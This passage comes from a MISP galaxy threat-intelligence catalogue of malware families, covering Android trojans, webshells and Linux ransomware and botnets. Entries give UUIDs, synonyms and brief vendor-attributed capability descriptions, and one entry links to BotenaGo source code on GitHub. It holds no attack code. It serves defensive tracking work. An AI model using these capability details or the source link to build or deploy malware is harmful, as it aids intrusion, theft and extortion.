UUID 7d418da3-d9d2-4005-8cc7-7677d1b11327 which can be used as unique global reference for Titan in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

ToxicPanda

Internal MISP references

UUID 7ac4865d-dc9d-468e-a462-67dfc63d118b which can be used as unique global reference for ToxicPanda in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Triada

Internal MISP references

UUID fa5fdfd2-8142-43f5-9b48-d1033b5398c8 which can be used as unique global reference for Triada in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

TrickMo

TrickMo is an advanced banking trojan for Android. Starting out as a companion malware to TrickBot in 2020, it first became a standalone banking trojan by addition of overlay attacks in 2021 and was later (2024) upgraded with remote control capabilities for on-device fraud. The continued development and progressively improved obfuscation suggests an active Threat Actor.

Internal MISP references

UUID cff89ce1-a133-48a6-b8bd-e4f97cf23d6a which can be used as unique global reference for TrickMo in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Triout

Bitdefender described Triout as a Android spyware, which appears to act as a framework for building extensive surveillance capabilities into seemingly benign applications. Found bundled with a repackaged app, the spyware’s surveillance capabilities involve hiding its presence on the device, recording phone calls, logging incoming text messages, recoding videos, taking pictures and collecting GPS coordinates, then broadcasting all of that to an attacker-controlled C&C (command and control) server.

Internal MISP references

UUID bd9ce51c-53f9-411b-b46a-aba036c433b1 which can be used as unique global reference for Triout in MISP communities and other software using the MISP galaxy

External references

https://malpedia.caad.fkie.fraunhofer.de/details/apk.triout - webarchive

Associated metadata

Metadata key	Value
type	[]

UltimaSMS

Internal MISP references

UUID 65476d5f-321f-4385-867a-383094cadb58 which can be used as unique global reference for UltimaSMS in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Unidentified APK 001

Internal MISP references

UUID bbd5a32e-a080-4f16-98ea-ad8863507aa6 which can be used as unique global reference for Unidentified APK 001 in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Unidentified APK 002

Internal MISP references

UUID afb6a7cc-4185-4f19-8ad4-45dcbb76e544 which can be used as unique global reference for Unidentified APK 002 in MISP communities and other software using the MISP galaxy

External references

https://malpedia.caad.fkie.fraunhofer.de/details/apk.unidentified_002 - webarchive

Associated metadata

Metadata key	Value
type	[]

Unidentified APK 004

According to Check Point Research, this is a RAT that is disguised as a set of dating apps like "GrixyApp", "ZatuApp", "Catch&See", including dedicated websites to conceal their malicious purpose.

Internal MISP references

UUID 55626b63-4b9a-468e-92ae-4b09b303d0ed which can be used as unique global reference for Unidentified APK 004 in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Unidentified APK 005

Internal MISP references

UUID 5413ca94-1385-40c0-8eb2-1fc3aff87fb1 which can be used as unique global reference for Unidentified APK 005 in MISP communities and other software using the MISP galaxy

External references

https://malpedia.caad.fkie.fraunhofer.de/details/apk.unidentified_005 - webarchive

Associated metadata

Metadata key	Value
type	[]

Unidentified APK 006

Information stealer posing as a fake banking app, targeting Korean users.

Internal MISP references

UUID 2263198d-af38-4e38-a7a8-4435d29d88e8 which can be used as unique global reference for Unidentified APK 006 in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Unidentified 007 (ARMAAN RAT)

According to Cyble, this is an Android application that pretends to be the legitimate application for the Army Mobile Aadhaar App Network (ARMAAN), intended to be used by Indian army personnel. The application was customized to include RAT functionality.

Internal MISP references

UUID 75c641c4-17df-43c4-9773-c27464c5d2ff which can be used as unique global reference for Unidentified 007 (ARMAAN RAT) in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Unidentified APK 008

Android malware distributed through fake shopping websites targeting Malaysian users, targeting banking information.

Internal MISP references

UUID 2ffddca0-841c-4eb6-9983-ff38abb5d6d6 which can be used as unique global reference for Unidentified APK 008 in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Unidentified APK 009 (Chrome Recon)

According to Google, a Chrome reconnaissance payload

Internal MISP references

UUID 6d3bcabe-6b3a-49c1-b1a9-2239ce06deae which can be used as unique global reference for Unidentified APK 009 (Chrome Recon) in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

VajraSpy

Internal MISP references

UUID c328b30f-e076-47dc-8c93-4d20f62c72ab which can be used as unique global reference for VajraSpy in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

vamp

Related to the micropsia windows malware and also sometimes named micropsia.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular vamp.

Known Synonyms
`android.micropsia`

Internal MISP references

UUID 1ad5b462-1b0d-4c2f-901d-ead6c9f227bc which can be used as unique global reference for vamp in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

VINETHORN

According to Mandiant, VINETHORN is an Android malware family capable of a wide range of backdoor functionality. It can steal system information, read SMS inboxes, send SMS messages, access contact lists and call histories, record audio and video, and track device location via GPS.

Internal MISP references

UUID 6da6dfb6-2c50-465c-9394-26695d72e8c7 which can be used as unique global reference for VINETHORN in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Viper RAT

Internal MISP references

UUID 3482f5fe-f129-4c77-ae98-76e25f6086b9 which can be used as unique global reference for Viper RAT in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Vultur

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Vultur.

Known Synonyms
`Vulture`

Internal MISP references

UUID 49b1c344-ce13-48bf-9839-909ba57649c4 which can be used as unique global reference for Vultur in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

WireX

Internal MISP references

UUID 77f2254c-9886-4eed-a7c3-bbcef4a97d46 which can be used as unique global reference for WireX in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

WolfRAT

Internal MISP references

UUID 994c7bb3-ba40-41bb-89b3-f05996924b10 which can be used as unique global reference for WolfRAT in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Wroba

According to Avira, this is a banking trojan targeting Japan.

Internal MISP references

UUID 40a5d526-ef9f-4ddf-a326-6f33dceeeebc which can be used as unique global reference for Wroba in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

WyrmSpy

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular WyrmSpy.

Known Synonyms
`AndroidControl`

Internal MISP references

UUID 77f81373-bb3a-449d-82ff-b28fe31acef6 which can be used as unique global reference for WyrmSpy in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Xbot

Internal MISP references

UUID 4cfa42a3-71d9-43e2-bf23-daa79f326387 which can be used as unique global reference for Xbot in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Xenomorph

Xenomorph is a Android Banking RAT developed by the Hadoken.Security actor.

Internal MISP references

UUID d202e42d-2c35-4c1c-90f1-644a8cae38f1 which can be used as unique global reference for Xenomorph in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

xHelper

Internal MISP references

UUID f54dec1f-bec6-4f4a-a909-690d65e0f14b which can be used as unique global reference for xHelper in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

XploitSPY

Internal MISP references

UUID 57600f52-b55f-49c7-9c0c-de10b2d23370 which can be used as unique global reference for XploitSPY in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

XRat

Internal MISP references

UUID a8f167a8-30b9-4953-8eb6-247f0d046d32 which can be used as unique global reference for XRat in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

YellYouth

Internal MISP references

UUID a2dad59d-2355-415c-b4d6-62236d3de4c7 which can be used as unique global reference for YellYouth in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Zanubis

According to cyware, Zanubis malware pretends to be a malicious PDF application. The threat actor uses it as a key to decrypt responses received from the C2 server.

Internal MISP references

UUID cebf13e5-dbfc-49d6-8715-e3b7687d386f which can be used as unique global reference for Zanubis in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Zen

Internal MISP references

UUID 46d6d102-fc38-46f7-afdc-689cafe13de5 which can be used as unique global reference for Zen in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

ZooPark

Internal MISP references

UUID b1fc66de-fda7-4f0c-af00-751d334444b3 which can be used as unique global reference for ZooPark in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Ztorg

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Ztorg.

Known Synonyms
`Qysly`

Internal MISP references

UUID 9fbf97c0-d87a-47b0-a511-0147a58b5202 which can be used as unique global reference for Ztorg in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Nightrunner

WebShell.

Internal MISP references

UUID b0206aac-30ff-41ce-b7d4-1b94ab15e3b1 which can be used as unique global reference for Nightrunner in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Tunna

WebShell.

Internal MISP references

UUID b057f462-dc32-4f7b-95e0-98a20a48f2b2 which can be used as unique global reference for Tunna in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

TwoFace

According to Unit42, TwoFace is a two-staged (loader+payload) webshell, written in C# and meant to run on webservers with ASP.NET. The author of the initial loader webshell included legitimate and expected content that will be displayed if a visitor accesses the shell in a browser, likely to remain undetected. The code in the loader webshell includes obfuscated variable names and the embedded payload is encoded and encrypted. To interact with the loader webshell, the threat actor uses HTTP POST requests to the compromised server.

The secondary webshell, which we call the payload, is embedded within the loader in encrypted form and contains additional functionality that we will discuss in further detail. When the threat actor wants to interact with the remote server, they provide data that the loader will use to modify a decryption key embedded within the loader that will be in turn used to decrypt the embedded TwoFace payload. Commands supported by the payload are execution of programs, up-, download and deletion of files and capability to manipulate MAC timestamps.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular TwoFace.

Known Synonyms
`HighShell`
`HyperShell`
`Minion`
`SEASHARPEE`

Internal MISP references

UUID a98a04e5-1f86-44b8-91ff-dbe1534782ba which can be used as unique global reference for TwoFace in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Unidentified ASP 001 (Webshell)

Internal MISP references

UUID d4318f40-a39a-4ce0-8d3c-246d9923d222 which can be used as unique global reference for Unidentified ASP 001 (Webshell) in MISP communities and other software using the MISP galaxy

External references

https://malpedia.caad.fkie.fraunhofer.de/details/asp.unidentified_001 - webarchive

Associated metadata

Metadata key	Value
type	[]

Abcbot

Abcbot is a modular Go-based botnet and malware that propagates via exploits and brute force attempts. The botnet was observed launching DDoS attacks, perform internet scans, and serve web pages. It is probably linked to Xanthe-based clipjacking campaign.

Internal MISP references

UUID 8d17175b-4e9f-43a9-851d-898bb6696984 which can be used as unique global reference for Abcbot in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Abyss Locker

Family based on HelloKitty Ransomware. Encryption algorithm changed from AES to ChaCha. Sample seems to be unpacked.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Abyss Locker.

Known Synonyms
`elf.hellokitty`

Internal MISP references

UUID 302a96b1-73cb-4f70-a329-e68debd87bf8 which can be used as unique global reference for Abyss Locker in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

ACBackdoor (ELF)

A Linux backdoor that was apparently ported to Windows. This entry represents the Linux version. This version appears to have been written first and the Windows version was ported later, without full functionality. The Linux version offers persistence as well as some process manipulation techniques, though both versions apparently offer the ability to access the command line and execute programs as well as self-update.

Internal MISP references

UUID cd2d7040-edc4-4985-b708-b206b08cc1fe which can be used as unique global reference for ACBackdoor (ELF) in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

AcidPour

Internal MISP references

UUID 11981e96-be46-4ce9-8085-af7224591951 which can be used as unique global reference for AcidPour in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

AcidRain

A MIPS ELF binary with wiper functionality used against Viasat KA-SAT modems.

Internal MISP references

UUID 6108aa3d-ea6e-47fd-9344-d333b07f5a56 which can be used as unique global reference for AcidRain in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

AgeLocker

Internal MISP references

UUID 5d04aac3-fdf5-4922-9976-3a5a75e96e1a which can be used as unique global reference for AgeLocker in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

AirDropBot

AirDropBot is used to create a DDoS botnet. It spreads as a worm, currently targeting Linksys routers. Backdoor and other bot functionality is present in this family. Development seems to be ongoing.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular AirDropBot.

Known Synonyms
`CloudBot`

Internal MISP references

UUID e91fcb82-e788-44cb-be5d-73b9601b9533 which can be used as unique global reference for AirDropBot in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Aisuru

Honeypot-aware variant of Mirai.

Internal MISP references

UUID e288425b-40f0-441e-977f-5f1264ed61b6 which can be used as unique global reference for Aisuru in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Akira (ELF)

Ransomware

Internal MISP references

UUID 365081b9-f60d-4484-befa-d4fc9d0f55d7 which can be used as unique global reference for Akira (ELF) in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

AnchorDNS

Backdoor deployed by the TrickBot actors. It uses DNS as the command and control channel as well as for exfiltration of data.

Internal MISP references

UUID b88dc3ec-d94c-4e6e-a846-5d07130df550 which can be used as unique global reference for AnchorDNS in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

ANGRYREBEL

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular ANGRYREBEL.

Known Synonyms
`Ghost RAT`

Internal MISP references

UUID 6cb47609-b03e-43d9-a4c7-8342f1011f3b which can be used as unique global reference for ANGRYREBEL in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

AVrecon

AVrecon is a Linux-based Remote Access Trojan (RAT) targeting small-office/home-office (SOHO) routers and other ARM-embedded devices. The malware is distributed via exploitation of unpatched vulnerabilities or common misconfiguration of the targeted devices. Once deployed, AVreckon will collect some information about the infected device, open a session to pre-configured C&C server, and spawn a remote shell for command execution. It might also download additional arbitrary files and run them. The malware has recently been used in campaigns aimed at ad-fraud activities, password spraying and data exfiltration.

Internal MISP references

UUID 1b218432-dd5c-4593-8f37-e202f9418fff which can be used as unique global reference for AVrecon in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

azazel

Azazel is a Linux user-mode rootkit based off of a technique from the Jynx rootkit (LD_PRELOAD technique). Azazel is purportedly more robust than Jynx and has many more anti-analysis features

Internal MISP references

UUID 37374572-3346-4c00-abc9-9f6883c8866e which can be used as unique global reference for azazel in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

B1txor20

B1txor20 is a malware that was discovered by 360 Netlab along others exploiting Log4J. the name is derived from using the file name "b1t", the XOR encrpytion algorithm, and the RC4 algorithm key length of 20 bytes. According to 360 Netlab this Backdoor for Linux platform uses DNS Tunnel to build a C2 communication channel. They also had the assumption that the malware is still in development, because of some bugs and not fully implemented features.

Internal MISP references

UUID 05e6d9ff-93a1-429b-b856-794d9ded75df which can be used as unique global reference for B1txor20 in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Babuk (ELF)

ESX and NAS modules for Babuk ransomware.

Internal MISP references

UUID 26b4d805-890b-4767-9d9f-a08adeee1c96 which can be used as unique global reference for Babuk (ELF) in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Backdoorit

According to Avast Decoded, Backdoorit is a multiplatform RAT written in Go programming language and supporting both Windows and Linux/Unix operating systems. In many places in the code it is also referred to as backd00rit.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Backdoorit.

Known Synonyms
`backd00rit`

Internal MISP references

UUID 4a4bc444-9e93-47a6-a572-0e13f743d875 which can be used as unique global reference for Backdoorit in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Irc16

Internal MISP references

UUID 3008fa01-492a-42e2-ab9b-a0a9d12823b8 which can be used as unique global reference for Irc16 in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

BADCALL (ELF)

BADCALL is a Trojan malware variant used by the group Lazarus Group.

Internal MISP references

UUID 350817e8-4d70-455e-b1fd-000bed4a4cf4 which can be used as unique global reference for BADCALL (ELF) in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Bashlite

Bashlite is a malware family which infects Linux systems in order to launch distributed denial-of-service attacks (DDoS). Originally it was also known under the name Bashdoor, but this term now refers to the exploit method used by the malware. It has been used to launch attacks of up to 400 Gbps.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Bashlite.

Known Synonyms
`Gafgyt`
`gayfgt`
`lizkebab`
`qbot`
`torlus`

Internal MISP references

UUID 81917a93-6a70-4334-afe2-56904c1fafe9 which can be used as unique global reference for Bashlite in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

BCMPUPnP_Hunter

Internal MISP references

UUID d8dd47a5-85fe-4f07-89dc-00301468d209 which can be used as unique global reference for BCMPUPnP_Hunter in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

BianLian (ELF)

Internal MISP references

UUID f6be433e-7ed0-4777-876b-e3e2ba7d5c7f which can be used as unique global reference for BianLian (ELF) in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

BiBi-Linux

According to Security Joes, this malware is an x64 ELF executable, lacking obfuscation or protective measures. It allows attackers to specify target folders and can potentially destroy an entire operating system if run with root permissions. During execution, it produces extensive output, which can be mitigated using the "nohup" command. It also leverages multiple threads and a queue to corrupt files concurrently, enhancing its speed and reach. Its actions include overwriting files, renaming them with a random string containing "BiBi," and excluding certain file types from corruption.

Internal MISP references

UUID efec7bb0-4ec7-4c97-a8a9-28e0fea19852 which can be used as unique global reference for BiBi-Linux in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Bifrost

Linux version of the bifrose malware that originally targeted Windows platform only. The backdoor has the ability to perform file management, start or end a process, or start a remote shell. The connection is encrypted using a modified RC4 algorithm.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Bifrost.

Known Synonyms
`elf.bifrose`

Internal MISP references

UUID 8fa6dd0e-b630-419f-bd01-5271dd8f27c6 which can be used as unique global reference for Bifrost in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

BigViktor

A DDoS bot abusing CVE-2020-8515 to target DrayTek Vigor routers. It uses a wordlist-based DGA to generate its C&C domains.

Internal MISP references

UUID 901ab128-2d23-41d7-a9e7-6a34e281804e which can be used as unique global reference for BigViktor in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

BioSet

Internal MISP references

UUID 8e301f58-acef-48e7-ad8b-c27d3ed38eed which can be used as unique global reference for BioSet in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Black Basta (ELF)

ESXi encrypting ransomware, using a combination of the stream cipher ChaCha20 and RSA.

Internal MISP references

UUID 35c86fef-18fe-491c-ad3c-13f98e8f5584 which can be used as unique global reference for Black Basta (ELF) in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

BlackCat (ELF)

ALPHV, also known as BlackCat or Noberus, is a ransomware family that is deployed as part of Ransomware as a Service (RaaS) operations. ALPHV is written in the Rust programming language and supports execution on Windows, Linux-based operating systems (Debian, Ubuntu, ReadyNAS, Synology), and VMWare ESXi. ALPHV is marketed as ALPHV on cybercrime forums, but is commonly called BlackCat by security researchers due to an icon of a black cat appearing on its leak site. ALPHV has been observed being deployed in ransomware attacks since November 18, 2021.

ALPHV can be configured to encrypt files using either the AES or ChaCha20 algorithms. In order to maximize the amount of ransomed data, ALPHV can delete volume shadow copies, stop processes and services, and stop virtual machines on ESXi servers. ALPHV can self-propagate by using PsExec to remote execute itself on other hosts on the local network.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular BlackCat (ELF).

Known Synonyms
`ALPHV`
`Noberus`

Internal MISP references

UUID 860e9d03-830e-4410-ac89-75b6eb89e7e5 which can be used as unique global reference for BlackCat (ELF) in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

BlackMatter (ELF)

Internal MISP references

UUID 1277a4bf-466c-40bc-b000-f55cbd0994a7 which can be used as unique global reference for BlackMatter (ELF) in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Blackrota

Internal MISP references

UUID a30aedcc-562e-437a-827c-55bc00cf3506 which can be used as unique global reference for Blackrota in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

BlackSuit (ELF)

According to Trend Micro, this ransomware has significant code overlap with Royal Ransomware.

Internal MISP references

UUID 5bdbeaae-0def-4547-9940-33ad94060955 which can be used as unique global reference for BlackSuit (ELF) in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

BOLDMOVE (ELF)

According to Mandiant, this malware family is attributed to potential chinese background and directly related to observed exploitation of Fortinet's SSL-VPN (CVE-2022-42475). There is also a Windows variant.

Internal MISP references

UUID 8f347147-c34e-4698-9439-c640233fca15 which can be used as unique global reference for BOLDMOVE (ELF) in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Break out the Box

This is a pentesting tool and according to the author, "BOtB is a container analysis and exploitation tool designed to be used by pentesters and engineers while also being CI/CD friendly with common CI/CD technologies.".

It has been observed being used by TeamTNT in their activities for spreading crypto-mining malware.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Break out the Box.

Known Synonyms
`BOtB`

Internal MISP references

UUID 57c9ab70-7133-441a-af66-10c0e4eb898b which can be used as unique global reference for Break out the Box in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

BotenaGo

According to Alien Labs, this malware targets embedded devices including routers with more than 30 exploits. SourceCode: https://github.com/Egida/kek/blob/19991ef983f838287aa9362b78b4ed8da0929184/loader_multi.go (2021-10-16)

Internal MISP references

UUID dffcc168-cb76-4ae6-b913-c369e92c614b which can be used as unique global reference for BotenaGo in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

BPFDoor

BPFDoor is a passive backdoor used by a China-based threat actor. This backdoor supports multiple protocols for communicating with a C2 including TCP, UDP, and ICMP allowing the threat actor a variety of mechanisms to interact with the implant.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular BPFDoor.

Known Synonyms
`JustForFun`

Internal MISP references

UUID 3c7082b6-0181-4064-8e35-ab522b49200f which can be used as unique global reference for BPFDoor in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

brute_ratel

Internal MISP references

UUID 2fa4ac4e-3f89-4fd0-b4fd-2c776dcf69d8 which can be used as unique global reference for brute_ratel in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Bvp47

Pangu Lab discovered this backdoor during a forensic investigation in 2013. They refer to related incidents as "Operation Telescreen".

Internal MISP references

UUID 0492f9bf-3c5d-4c17-993b-2b53d0fb06f7 which can be used as unique global reference for Bvp47 in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Caja

Linux malware cross-compiled for x86, MIPS, ARM. XOR encoded strings, 13 commands supported for its C&C, including downloading, file modification and execution and ability to run shell commands.

Internal MISP references

UUID 06816c22-be7c-44db-8d0d-395ab306bb9b which can be used as unique global reference for Caja in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Caligula

According to Avast Decoded, Caligula is an IRC multiplatform bot that allows to perform DDoS attacks. It is written in Go and distributed in ELF files targeting Intel 32/64bit code, as well as ARM 32bit and PowerPC 64bit. It is based on the Hellabot open source project.

Internal MISP references

UUID c936f24c-c04a-4cab-9ac6-6384a2d4c283 which can be used as unique global reference for Caligula in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Capoae

XMRig-based mining malware written in Go.

Internal MISP references

UUID c1b0528b-c674-4c76-8e1d-5846ba8af261 which can be used as unique global reference for Capoae in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

CDorked

This is in the same family as eBury, Calfbot, and is also likely related to DarkLeech

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular CDorked.

Known Synonyms
`CDorked.A`

Internal MISP references

UUID bb9eaaec-97c9-4014-94dd-129cecf31ff0 which can be used as unique global reference for CDorked in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

CDRThief

Internal MISP references

UUID 27d06ac9-42c4-433a-b1d7-660710d9e8df which can be used as unique global reference for CDRThief in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Cephei

Internal MISP references

UUID baa0704b-50d8-48af-91e1-049f30f422cc which can be used as unique global reference for Cephei in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Cetus

Internal MISP references

UUID 7a226df2-9599-4002-9a38-b044e16f76a9 which can be used as unique global reference for Cetus in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Chalubo

Sophos describes this malware as a DDoS bot, with its name originating from ChaCha-Lua-bot due to its use of ChaCha cipher and Lua. Variants exist for multiple architectures and it incorporates code from XorDDoS and Mirai.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Chalubo.

Known Synonyms
`ChaChaDDoS`

Internal MISP references

UUID af91c777-93f7-4b7f-981f-141478972011 which can be used as unique global reference for Chalubo in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Chaos (ELF)

Multi-functional malware written in Go, targeting both Linux and Windows, evolved from elf.kaiji.

Internal MISP references

UUID ef03e3c3-32d5-483a-bd1f-97dd531c4bca which can be used as unique global reference for Chaos (ELF) in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Chapro

Internal MISP references

UUID 700366d8-4036-4e48-9a5f-bd6e09fb9b6b which can be used as unique global reference for Chapro in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Chisel (ELF)

Chisel is an open-source project by Jaime Pillora (jpillora) that allows tunneling TCP and UDP connections via HTTP. It is available across platforms and written in Go. While benign in itself, Chisel has been utilized by multiple threat actors. It was for example observed by SentinelOne during a PYSA ransomware campaign to achieve persistence and used as backdoor. Github: https://github.com/jpillora/chisel

Internal MISP references

UUID e5600185-39b7-49a0-bd60-a6806c7d47dd which can be used as unique global reference for Chisel (ELF) in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Clop (ELF)

ELF version of clop ransomware.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Clop (ELF).

Known Synonyms
`Cl0p`

Internal MISP references

UUID 3d11ec52-9ca8-4d83-99d4-6658f306e8e4 which can be used as unique global reference for Clop (ELF) in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Cloud Snooper

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Cloud Snooper.

Known Synonyms
`Snoopy`

Internal MISP references

UUID 0b1c514d-f617-4380-a28c-a1ed305a7538 which can be used as unique global reference for Cloud Snooper in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

ConnectBack

ConnectBack malware is a type of malicious software designed to establish unauthorized connections from an infected system to a remote server. Once a victim's device is compromised, ConnectBack creates a covert channel for communication, allowing the attacker to remotely control and gather sensitive information from the compromised system.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular ConnectBack.

Known Synonyms
`Getshell`

Internal MISP references

UUID 82c57d1b-c11b-44f7-9675-2f0d23fb543f which can be used as unique global reference for ConnectBack in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Conti (ELF)

Ransomware

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Conti (ELF).

Known Synonyms
`Conti Locker`

Internal MISP references

UUID c1ab8323-ce61-409a-80f3-b945c8ffcd42 which can be used as unique global reference for Conti (ELF) in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Cpuminer (ELF)

This was observed to be pushed by IoT malware, abusing devices for LiteCoin and BitCoin mining.

Internal MISP references

UUID 8196b6f6-386e-4499-b269-4e5c65f74141 which can be used as unique global reference for Cpuminer (ELF) in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Cr1ptT0r

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Cr1ptT0r.

Known Synonyms
`CriptTor`

Internal MISP references

UUID 196b20ec-c3d1-4136-ab94-a2a6cc150e74 which can be used as unique global reference for Cr1ptT0r in MISP communities and other software using the MISP galaxy

External references

Associated metadata

